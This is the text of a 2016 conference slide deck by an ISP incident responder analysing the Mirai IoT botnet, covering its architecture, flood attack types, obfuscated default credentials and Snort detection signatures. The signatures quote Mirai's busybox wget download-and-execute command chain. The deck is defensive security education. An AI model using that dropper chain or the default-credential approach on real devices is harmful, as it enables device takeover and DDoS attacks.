Look Into The Future - Analyzing Mirai botnet - Mauritius 2016 - - PowerPoint PPT Presentation

Look Into The Future

• Analyzing Mirai botnet -

Mauritius 2016 FIRST TC Minoru Kobayashi Internet Initiative Japan Inc.

Who am I ?

• Minoru Kobayashi
• I work for “Internet Initiative Japan Inc.”.
• IIJ is a Japanese ISP (We are the first commercial ISP in Japan).
• CISSP
• I’m a member of CSIRT called “IIJ-SECT”.
• We are incident responders for our customer and our company.
• Our jobs include…
• Malware Analysis
• Forensic Investigation
• Incident Response and Handling
• Developing and operating honeypot and web crawler

system

• Surveying malware and attacking technique trends
• Hands-on Trainer, Speaker
• Including Blackhat, FIRST, internal lecture

for Japanese government and so on.

• Writing reports for our quarterly

report (called “IIR”) and blogs

What is Mirai Botnet ?

• Distributed Denial of Service (DDoS) System
• Infect to IoT devices via Telnet (23/tcp)
• IoT device = Network Camera, Digital Video Recorder, Router,

and so on.

• Use dictionary attack (factory default passwords)
• Mirai was used to attack “Krebs on Security” and

“OVH” in late September.

• Krebs on Security : 620Gbps
• OVH : over 1Tbps
• “Anna-senpai” has released Mirai source code in early

October, suddenly.

• Anna-senpai is an author of Mirai.

What means “Mirai” ?

• In Japanese, Mirai can be written as “未来”. These

Kanji characters are pronounced “Mirai”.

• “未来” means “the future” in English. So I gave a

title to this presentation “Looking Into The Future”. 

BTW, Who is Anna-senpai ?

• The source code release announce was posted on

the hacking community “Hackforums”.

• He(She?) used a Japanese animation character as

his avatar and his handle name is “Anna-senpai”.

• I don’t know that name. Let’s google.

Who is she?

Anna-senpai is …

• Anna-senpai is the name of Japanese animation
• character. The story of this animation is a fictional

future.

• Anna-senapi (the author of Mirai) may be an animation
• Otaku. So, I think Anna-senpai called this malware Mirai.
• Otaku is a Japanese slang. Synonym for a geek.
• One more interested thing, the source code of Mirai

contains some Russian strings. Therefore Anna-senpai

• r his/her related parties could be Russian-speaking

people.

Mirai is Open Source now.

Dive to source code

Mirai Botnet System Architecture

①Register Bot ②Scan random IP addresses and Attempt to login ③Report the IP address and credential ④Pass credentials ⑤Send commands to download Bot binary ⑥Request to download Bot binary ⑨DDoS Attack ⑧Use Mirai via CLI/API

C&C DB Scan Receiver Loader Victim Server Admin/User

HTTP/TFTP Server

IoT (Victim) IoT (Bot)

⑦Execute Bot binary

Attack command list

Attack ID Command Description udp UDP flood 1 vse Valve source engine specific flood 2 dns DNS resolver flood using the targets domain, input IP is ignored 3 syn SYN flood 4 ack ACK flood 5 stomp TCP stomp flood 6 greip GRE IP flood 7 greeth GRE Ethernet flood 8 (none) Proxy knockback connection 9 udpplain UDP flood with less options. optimized for higher PPS 10 http HTTP flood

Attack ID 8 is assigned, but not implemented.

Dive to source code again

• Credentials of IoT device are hardcoded and
• bfuscated.
• You can see this list at mirai/bot/scanner.c.
• Mirai has 61 kinds of credentials.
• Get to de-obfuscate, you have to XOR by 0x22.

Can I detect it ?

• The answer is … YES !!
• All the Mirai communications are NOT encrypted.

So you can write IDS/IPS signatures easy.

• You can see it like below:

This traffic is a part of process 5. You can see “/bin/busybox wget” command.

Snort Signatures

• Snort is one of most popular open source IDS/IPS.
• You can write signatures to detect Mirai like below:
• Register Bot (Process ①)
• alert tcp any any -> any 23 (msg:"Mirai Botnet: Register Bot with C&C";

flow:to_server,established; content:"|00 00 00 01|"; depth:4; sid:1000000; rev:1)

• Send a command to Download Bot (Process ⑤)
• alert tcp any any -> any [23,2323] (msg:"Mirai Botnet: Download Bot binary via

Telnet (wget)"; flow:to_server,established; content:"/bin/busybox wget http://"; content:"/bins/mirai."; content:"-O - > dvrHelper|3b| /bin/busybox chmod 777 dvrHelper|3b| /bin/busybox ECCHI"; sid:1000070; rev:1)

But attackers can easily modify these indicator of attack, so these may not detect new version or variants of Mirai. Be careful. All the Snort signature I wrote, will be published in our quarterly report IIR next issue (Vol.33).

Demo 1 Using Mirai

Demo 1 environment

①Register Bot ②Scan random IP addresses and Attempt to login ③Report the successful IP address and credential ④Transfer credentials ⑤Send commands to download Bot binary ⑥Request to download Bot binary ⑨DDoS Attack ⑧Use Mirai via CLI/API

C&C DB Scan Receiver Loader Victim Server Admin/User

HTTP/TFTP Server

IoT (Victim) IoT (Bot)

⑦Run Bot binary

192.168.153.10 192.168.153.20 192.168.153.100

Demo 2 Detect Mirai by Snort

How can you check your IoT device was infected ?

• 1. Check the number of access to 23/tcp and 2323/tcp.
• Mirai Bot almost scans 23/tcp. But once in 10 times, scans

2323/tcp.

• It always scans random IPs. Therefore the number of access

to these ports rise abruptly.

• 2. Check that you can access to management port.
• You may not be able to the management port on IoT device

(e.g. Telnet, SSH, WebUI, etc.).

• Mirai kills the management processes on IoT device.
• I believe it is to protect from other IoT bot malwares and to

get high performance for DDoS.

• 3. Of course, you can also use Snort. 

Conclusion

• Check immediately whether your IoT device is

infected.

• To remove Mirai, just reboot it. It’s easy. 
• Change login password of IoT device.
• Attackers already know the default password, because it

is placed in online manual.

• Don’t directly connect IoT devices to the Internet.
• If you need to access from the Internet, you have to

set up an access control list.

• If possible, you have to use encrypted management

protocols such as SSH/HTTPS.

Thank you